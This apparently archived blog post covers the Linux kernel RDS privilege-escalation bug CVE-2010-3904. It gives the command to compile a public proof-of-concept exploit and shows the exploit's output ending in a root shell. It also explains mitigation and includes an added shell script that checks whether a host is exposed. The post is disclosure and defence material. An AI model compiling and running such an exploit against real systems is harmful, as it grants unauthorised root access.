Thursday, February 17, 2011

Linux Kernel 2.6.30+ RDS Vulnerability

Recently it was reported by VSR Security that Linux kernel versions 2.6.30 and later are affected by a local privilege-escalation vulnerability (CVE-2010-3904) in the implementation of RDS (Reliable Datagram Sockets). The RDS code copied data to and from user-supplied addresses without checking that those addresses actually lay in user space, which lets an unprivileged local user overwrite kernel memory.


Linus Torvalds has committed a patch upstream to close the hole; the fix is part of kernel 2.6.36, and distributions have backported it to their older kernels. VSR Security has released a proof-of-concept exploit to demonstrate the severity of the vulnerability.


You can compile the exploit using:
gcc linux-rds-exploit.c -o CVE-2010-3904-exploit


Upon running the binary on an affected machine, you’ll get:



[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xf7f577b0
[+] Resolved rds_ioctl to 0xf7f52000
[+] Resolved commit_creds to 0xc04596eb
[+] Resolved prepare_kernel_cred to 0xc04595e9
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
sh-4.1#


For your machine to be affected you need to have the rds kernel module loaded, which can be checked with:
lsmod | grep rds
Which would return:
sh-4.1# lsmod | grep rds
rds 52948 4
Note that lsmod only shows modules that are loaded right now: on a stock kernel that ships rds.ko, the first process to create an RDS socket causes the module to be loaded automatically, so an empty lsmod result does not by itself mean the machine is safe. Until the kernel is updated, the usual mitigation is to prevent the module from being loaded at all (for example an "install rds /bin/true" line in a file under /etc/modprobe.d/), which is also what makes the exploit fail at the socket step shown below.
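The following POSIX shell script is an added example, not part of the original post or of VSR's exploit. It turns the two checks above into functions that can be run against this host or against captured input: whether the running kernel version falls in the affected range (assumed here as 2.6.30 up to but not including the 2.6.36 release, which carried the fix; distribution backports make this only a hint), whether rds currently appears in lsmod output, and whether modprobe configuration already blocks the module from autoloading. The sample lsmod and modprobe text embedded in the script is constructed for the demonstration.

```shell
#!/bin/sh
# Added example: host check for the RDS socket bug (CVE-2010-3904).
# Assumptions: affected range is 2.6.30 <= version < 2.6.36 (fix landed in the
# 2.6.36 release; -rc kernels of 2.6.36 are treated as still affected), and the
# autoload block is an "install rds /bin/true" (or /bin/false) modprobe line.

# kernel_in_range VERSION  -> exit 0 if VERSION is in the assumed affected range
kernel_in_range() {
    v=${1%%-*}                           # 2.6.35-22-generic -> 2.6.35, 2.6.36-rc8 -> 2.6.36
    case "$1" in *-rc*) upper=37 ;; *) upper=36 ;; esac   # release candidates predate the fix
    major=$(printf '%s' "$v" | cut -d. -f1)
    minor=$(printf '%s' "$v" | cut -d. -f2)
    patch=$(printf '%s' "$v" | cut -d. -f3)
    patch=${patch:-0}
    [ "$major" -eq 2 ] && [ "$minor" -eq 6 ] && [ "$patch" -ge 30 ] && [ "$patch" -lt "$upper" ]
}

# rds_loaded LSMOD_OUTPUT  -> exit 0 if an "rds" module line is present
rds_loaded() {
    printf '%s\n' "$1" | grep -q '^rds[[:space:]]'
}

# rds_blacklisted MODPROBE_CONF  -> exit 0 if rds autoloading is blocked
rds_blacklisted() {
    printf '%s\n' "$1" | grep -Eq '^[[:space:]]*install[[:space:]]+rds[[:space:]]+/bin/(true|false)'
}

# report KERNEL LSMOD_OUTPUT MODPROBE_CONF  -> prints a verdict, exit 0 if exposed
report() {
    kernel=$1; lsmod_out=$2; modprobe_conf=$3
    if ! kernel_in_range "$kernel"; then
        echo "kernel $kernel: outside the assumed affected range (check distro backports)"
        return 1
    fi
    if rds_loaded "$lsmod_out"; then
        echo "kernel $kernel: affected range and rds is loaded -> exposed"
        return 0
    fi
    if rds_blacklisted "$modprobe_conf"; then
        echo "kernel $kernel: affected range, rds not loaded and autoload blocked -> mitigated"
        return 1
    fi
    echo "kernel $kernel: affected range, rds not loaded but may autoload on socket() -> exposed"
    return 0
}

# Constructed sample input for the stand-alone demonstration.
SAMPLE_LSMOD='Module                  Size  Used by
rds                    52948  4
ext4                  360000  2'
SAMPLE_MODPROBE='# constructed /etc/modprobe.d/rds.conf
install rds /bin/true'

if [ "${1:-}" = "--live" ]; then
    # Run against this host: uname -r, lsmod, and every file under /etc/modprobe.d/
    report "$(uname -r)" "$(lsmod)" "$(cat /etc/modprobe.d/* 2>/dev/null)"
else
    report "2.6.35-22-generic" "$SAMPLE_LSMOD" ""                 # loaded -> exposed
    report "2.6.35-22-generic" "Module Size Used by" "$SAMPLE_MODPROBE"   # blocked -> mitigated
    report "2.6.36" "$SAMPLE_LSMOD" ""                            # fixed release -> out of range
fi
```

Run it with `--live` on the host you want to check; without arguments it exercises the constructed samples. Treat "out of range" as a prompt to consult your distribution's advisory rather than as a clean bill of health, because vendor kernels carry the fix under older version numbers.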


If your machine is not affected (the rds module is absent, or blocked from loading), running the above binary results in a message like so:



[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Could not open socket.

